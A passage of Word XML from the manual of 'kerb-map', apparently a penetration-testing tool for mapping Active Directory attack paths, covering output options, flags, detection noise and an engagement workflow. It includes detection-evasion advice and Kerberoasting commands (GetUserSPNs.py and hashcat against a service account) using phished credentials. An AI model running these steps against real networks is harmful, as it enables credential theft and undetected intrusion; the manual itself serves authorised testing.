          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Trust Map — domain and forest trust relationships with risk scoring (v1.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE / Misconfiguration Checks — per-CVE results with vulnerable/not-vulnerable status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Priority Attack Paths — unified ranked list with next-step commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan Summary — counts, recommended first move</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="7_2_JSON_Export___o_json_" w:id="49"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 JSON Export (-o json)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Writes the complete scan results as a structured JSON file. The file contains every field from every module including raw evidence, full account lists, CVE details, and the complete ranked target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jsmith -p pass -o json</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># Outputs: kerb-map_corp.local_20250319_143022.json</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Custom filename:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py ... -o json --outfile engagement_day1.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="7_3_BloodHound_Export___o_bloodhound_" w:id="50"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.3 BloodHound Export (-o bloodhound)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Writes a BloodHound-compatible JSON file containing custom nodes for Kerberoastable and AS-REP Roastable accounts with the hasspn and dontreqpreauth properties set. This file can be imported directly into BloodHound for visual path analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="7_4_Scan_History_Database" w:id="51"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.4 Scan History Database</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Every scan is automatically saved to a local SQLite database at ~/.kerb-map/results.db. This allows you to compare findings across multiple scans, replay findings without re-scanning, and track when new attack surface appears.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List all stored scans</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py --list-scans</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Example output:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># ID 3  corp.local  DC: 192.168.1.10  Operator: jsmith  2025-03-19T14:30:22</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># ID 2  corp.local  DC: 192.168.1.10  Operator: jsmith  2025-03-18T09:15:11</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Replay findings from scan #3</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">python kerb-map.py --show-scan 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use --no-cache to skip saving a scan to the database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="8__Complete_Flag_Reference" w:id="52"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Complete Flag Reference</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="8_1_Target___Authentication" w:id="53"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Target &amp; Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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Flag</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 / --domain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Target domain name (e.g. corp.local)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-dc / --dc-ip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Domain controller IP address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-u / --username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Domain username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 / --password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Plaintext password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 / --hash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NTLM hash. Accepts LM:NT or NT only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-k / --kerberos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Use Kerberos ccache ticket. Set KRB5CCNAME first.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="8_2_Module_Selection" w:id="54"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Module Selection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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Flag</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--all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Run all modules. Default if no specific module flags given.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--spn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Run SPN scanner (Kerberoastable accounts)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--asrep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Run AS-REP scanner (pre-auth disabled)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--delegation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Run delegation mapper (all three types)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--users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Run user enumerator (policy, trusts, DnsAdmins, LAPS)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--encryption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Run encryption auditor (v1.1)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--trusts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Run trust mapper (v1.1)</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--cves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Run CVE / misconfiguration checks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--aggressive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Enable RPC-based CVE probes. Generates Windows events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="8_3_Output" w:id="55"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3 Output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5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Flag</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-o json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Write full results to JSON file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-o bloodhound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Write BloodHound-compatible JSON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--outfile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Override the default output filename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--top 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Show top N entries in priority table (default: 15)</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--no-cache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Do not save results to local SQLite database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="8_4_Tuning" w:id="56"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.4 Tuning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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Flag</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--stealth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Add random 0.8–3.0s jitter between LDAP queries. Slower but less likely to trigger volume-based detection.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--timeout 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connection timeout in seconds (default: 10)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--threads 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Number of concurrent LDAP queries (default: 10)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--page-size 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LDAP paging size (default: 1000)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--no-color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Disable Rich formatting for piping to files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="8_5_Scan_History" w:id="57"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">8.5 Scan History</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Flag</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--list-scans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List all scans stored in local cache. No network connection required.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--show-scan ID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Display findings from a previous scan by its ID number.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--diff-scans ID1 ID2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Compare findings between two scans.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--purge-history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Delete all stored scan data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="9__Detection_Profile" w:id="58"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Detection Profile</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding what noise kerb-map generates is essential for deciding how to operate. All detection information below assumes a well-monitored environment with a SIEM ingesting DC event logs and Microsoft Defender for Identity (MDI) deployed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="9_1_Noise_Level_by_Module" w:id="59"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1 Noise Level by Module</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800"/>
        <w:gridCol w:w="29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Module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Noise Level</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Windows Events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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MDI Detection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LDAP queries (all safe modules)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1644 only if LDAP diag logging enabled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SPN Scanner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Standard LDAP — indistinguishable from admin tools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AS-REP Scanner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Single LDAP search filter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Delegation Mapper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Queries delegation attributes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User Enumerator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Multiple LDAP queries, all standard filters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Encryption Auditor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Queries msDS-SupportedEncryptionTypes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Trust Mapper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Queries trustedDomain objects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noPac Check</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Version and hotfix check only</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AD CS Check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Queries certificate template and CA objects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GPP Passwords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MEDIUM</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5145 (SMB share access on SYSVOL)</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Possible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Bronze Bit / Certifried / LDAP Signing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Standard LDAP queries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ZeroLogon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Netlogon 5805, 5827 — triggers EDR alerts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Yes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PrintNightmare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5145 (named pipe spoolss) — triggers EDR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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes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PetitPotam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HIGH</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5145 (EFSRPC pipe) + outbound auth attempt</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="9_2_Staying_Quiet" w:id="60"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9.2 Staying Quiet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">When stealth is a priority:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Omit --aggressive — all high-noise modules require this flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use --stealth — adds random 0.8–3.0s jitter between LDAP queries to avoid volume-based detections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Avoid --cves entirely during initial reconnaissance — save CVE checks for a follow-up scan after initial findings are reviewed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Run during business hours — LDAP queries from a legitimate user account blend with normal domain traffic during the workday.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Kerberos auth (-k) — avoids NTLM authentication events (Event ID 4624 Type 3) that some SOCs monitor closely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="9_3_The_RC4_Problem" w:id="61"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">9.3 The RC4 Problem</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Many kerb-map findings depend on the continued prevalence of RC4-HMAC (etype 23) in Active Directory. RC4 is a stream cipher from 1987 that remains the default Kerberos encryption type in most AD environments for backward compatibility. Its use means that Kerberoasted hashes can be cracked at billions of attempts per second on consumer GPUs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Organisations that enforce AES-only Kerberos encryption (via GPO or msDS-SupportedEncryptionTypes) eliminate the most impactful Kerberoasting and AS-REP roasting attack paths. The encryption auditor module (--encryption) specifically highlights this gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="10__Typical_Engagement_Workflow" w:id="62"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Typical Engagement Workflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how kerb-map slots into an actual engagement after you already have initial credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="10_1_Step_1___Initial_Foothold" w:id="63"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.1 Step 1 — Initial Foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You just got creds from a phish or spray. Run the mapper first to see the full attack surface before touching anything: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jsmith -p Summer2024!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="10_2_Step_2___Review_the_Priority_Table" w:id="64"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.2 Step 2 — Review the Priority Table</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Review the ranked output. Focus on findings with scores above 70 first. The priority table tells you exactly what to do and in what order.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="10_3_Step_3___Execute_Against_Top_Targets" w:id="65"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.3 Step 3 — Execute Against Top Targets</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The mapper says svc_sql is the top priority Kerberoast target. Execute the pre-filled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GetUserSPNs.py corp.local/jsmith:Summer2024! -request-user svc_sql -outputfile svc_sql.hash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">hashcat -m 13100 svc_sql.hash /usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="10_4_Step_4___Re_run_With_Elevated_Creds" w:id="66"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4 Step 4 — Re-run With Elevated Creds</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_sql cracked. Re-run the mapper with the new credentials for an expanded view. Higher-privileged accounts may reveal additional attack surface that was not visible to the original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kerb-map.py -d corp.local -dc 192.168.1.10 -u svc_sql -p Cracked123! --cves -o json</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="10_5_Step_5___Use_the_JSON_Report" w:id="67"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">10.5 Step 5 — Use the JSON Report</w:t>
      </w:r>
